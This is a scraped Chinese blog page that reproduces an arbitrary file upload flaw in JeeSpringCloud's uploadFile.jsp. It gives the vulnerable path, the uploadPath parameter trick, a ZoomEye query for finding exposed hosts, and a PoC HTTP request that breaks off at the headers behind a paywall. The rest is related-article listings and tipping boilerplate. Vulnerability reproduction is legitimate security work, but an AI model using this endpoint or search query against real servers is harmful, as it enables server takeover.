JeeSpringCloud uploadFile.jsp 文件上传漏洞复现

最新推荐文章于 2024-04-06 05:33:22 发布
最新推荐文章于 2024-04-06 05:33:22 发布
阅读量974 收藏 9
点赞数 9
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134658234
版权

 0x01 产品简介

  JeeSpringCloud是一款免费开源的JAVA互联网云快速开发平台,微服务分布式代码生成的敏捷开发系统架构,项目代码简洁、注释丰富、上手容易、还同时集中分布式、分布式事务、微服务,同时包含许多基础模块和监控、服务模块,JeeSpringCloud GVP项目、1k+Star项目。

0x02 漏洞概述

 JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台。JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上传任意文件,并可通过 uploadPath 参数指定文件上传路径,导致服务器被控制。

0x03 复现环境

钟馗之眼:app:"JeeSpringCloud"

0x04 漏洞复现 

PoC

POST /static/uploadify/uploadFile.jsp?uploadPath=/static/uploadify/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 199
Content-Type: multipart/form-data; boundary=0d0d9bdfedC1bF17Cb47265DdCb04266
Accept-Encoding: gzip
Connection: cl
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
万户 OA OfficeServer.jsp 任意文件上传漏洞复现
0xSec
12-16 1226
万户OA OfficeServer.jsp接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件从而控制整个服务器。
UploadFile.class.php支持多文件上传的上传类
03-31
UploadFile.class.php支持多文件上传的上传类 说明:支持多文件上传的上传类 使用方法: include '../UploadFile.class.php'; $upload=new UploadFile(); if(!$upload->upload()) { // 上传错误提示错误信息 $...
Goby 漏洞发布|JeeSpringCloud uploadFile.jsp 文件上传漏洞
m0_46699477的博客
10-10 677
深信服下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。深信服下一代防火墙在 login.cgi 路径下,PHPSESSID 处存在命令执行漏洞。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
记一次曲折的获取权限
m0_60571990的博客
12-10 887
记一次曲折的获取权限
Jeeplus快速开发平台 validateMobileExist SQL注入漏洞
0xSec
02-20 558
JeePlus快速开发平台validateMobileExist 接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞
云瀚安行
03-13 634
JeePlus快速开发平台validateMobile接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
jsp+javabean_uploadfile.rar_java uploadfile_jsp uploadfi_jsp 文件上
09-23
本教程将详述如何使用JSP(JavaServer Pages)和JavaBean来实现多文件上传的功能。我们将围绕以下核心知识点展开: 1. **Multipart请求解析**: 当用户通过表单提交包含文件的请求时,浏览器会将这些文件以...
upLoadFile.jsp
05-27
上传图片校验图片格式和大小,清空图片输入框控件,提交校验必填项等等均已经验证成功 , 可以直接使用。请放心下载,支持正版(哈哈哈)。
UploadFIle.rar_Jsp/Servlet_Java_
08-11
`UploadFile.rar_Jsp/Servlet_Java_`这个标题暗示了我们讨论的是一个关于使用Java Servlet和JSP来实现文件上传功能的示例。这个功能尤其适用于网站或应用程序,让用户能够上传图片等文件。下面将详细阐述Jsp、...
uploadFile.zip
07-26
本压缩包"uploadFile.zip"包含了一个简单的Spring Boot项目,演示了如何实现文件上传的功能。下面将详细解释这个模型中涉及的关键知识点。 1. **Spring Boot 2.0基础**: Spring Boot 2.0是基于Spring Framework 5...
泛微OA e-office平台uploadify.php任意文件上传漏洞
薛定谔嘚喵博客
10-07 957
泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。 泛微OA e-office平台uploadify.php处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
uploadify文件上传实例
YYQ_QYY的专栏
09-30 514
需要引入的js文件和css文件:    <script type="text/javascript" src="plugins/uploadify/swfobject.js"> var jsessionid = "";  //勿删,uploadify兼容火狐用到 hTML文件: 文件: 保存 upload
uploadify上传无反应_【取证实战】Hacker利用某类网站的文件上传漏洞批量渗透
weixin_39637260的博客
12-13 179
来源:电子取证及可信应用协创中心,作者:Hayden某类Web网站系统因为存在文件上传漏洞,文件包含漏洞,被Hacker利用后进行了批量的渗透,造成一大部分网站的后台被植入后门,对相关企事业单位造成不良影响。0x01概述其实,这个漏洞就是由于对于上传的文件校验不够严格,导致出现了文件上传漏洞,同时利用了网站存在的文件包含漏洞,使得Hacker能够获取Webshell得到的信息如下,以下内...
Spring Cloud Gateway RCE漏洞原理分析与复现(CVE-2022-22947)
日常技术分享
10-16 5018
Spring Cloud Gateway RCE漏洞原理分析与复现(CVE-2022-22947)
Web安全系列:文件上传漏洞从入门到精通
weixin_68076304的博客
02-27 536
文件上传漏洞简介文件上传漏洞File Upload Vulnerability)是一种常见的 Web 应用程序漏洞,通常存在于需要用户上传文件的应用程序中,如论坛、电子商务网站、博客、社交网站等。攻击者可以通过该漏洞上传恶意文件到服务器,从而执行各种攻击操作,如执行命令、窃取敏感数据、植入后门等。文件上传漏洞通常发生的原因多是服务器未正确验证上传文件类型、大小、路径等参数等,攻击者可以利用这些漏洞绕过服务器的限制,上传恶意文件或脚本到服务器。
upload文件上传漏洞复现(1),内容太过真实
最新发布
m0_60732644的博客
04-06 871
使用抓包软件,更改web.php的文件类型为image/jpeg放包后发现上传成功。
CVE-2023-1454 Jeecg-Boot-qurestSql-SQL-漏洞检测
m0_66376444的博客
04-11 1350
JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。JeecgBoot qurestSql处存在SQL注入漏洞,攻击者可以从其中获取数据库权限。访问路径:/jeecg-boot/jmreport/qurestSql。初步了解,存在这个路径可能会存在sql漏洞。出现这个说明存在漏洞
CMS建站平台Java版-Jeeplus cms
mhlywxl的博客
10-11 989
本章主要介绍Java版的CMS建站平台:Jeeplus Cms,众所周知,市面上的CMS平台基本上都是php语言,漏洞比较多,基本上不维护,而且php语言已经相对落后;相比而言Java版的修改灵活方便,可拓展性强,性价比高一、平台特点cms建站神器可以同时管理维护多个网站可定制不同主题模板,基于freemarker语法更友好的交互体验,内容发布实时展示灵活的建站设置,支持多种类型的网站网站类型多样化,不同主题随意切换面向全屏幕尺寸的响应式适配能力后台基于Java框架,方便集群和性能调优。
如何使用wx.uploadFile接口上传文件?
04-01
使用wx.uploadFile接口可以实现文件上传功能。下面是使用wx.uploadFile接口的步骤: 1. 首先,需要引入微信小程序的API,可以在页面的js文件中添加以下代码: ```javascript const wx = require('weixin-js-sdk'); ``` 2. 在需要上传文件的事件处理函数中,调用wx.uploadFile接口。该接口需要传入一个对象参数,包含以下属性: - url:上传文件的服务器接口地址。 - filePath:要上传的文件的路径。 - name:文件对应的 key,服务器端通过这个 key 可以获取到文件的二进制内容。 - formData:其他额外的参数,可以在服务器端通过这个参数获取到。 示例代码如下: ```javascript wx.uploadFile({ url: 'https://example.com/upload', filePath: 'path/to/file', name: 'file', formData: { 'user': 'test' }, success(res) { // 上传成功后的处理逻辑 console.log(res.data); }, fail(res) { // 上传失败后的处理逻辑 console.log(res.errMsg); } }); ``` 3. 在服务器端接收文件并进行处理。根据具体的服务器端语言和框架,可以使用相应的方式接收上传的文件,并进行相应的处理。 以上就是使用wx.uploadFile接口上传文件的基本步骤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值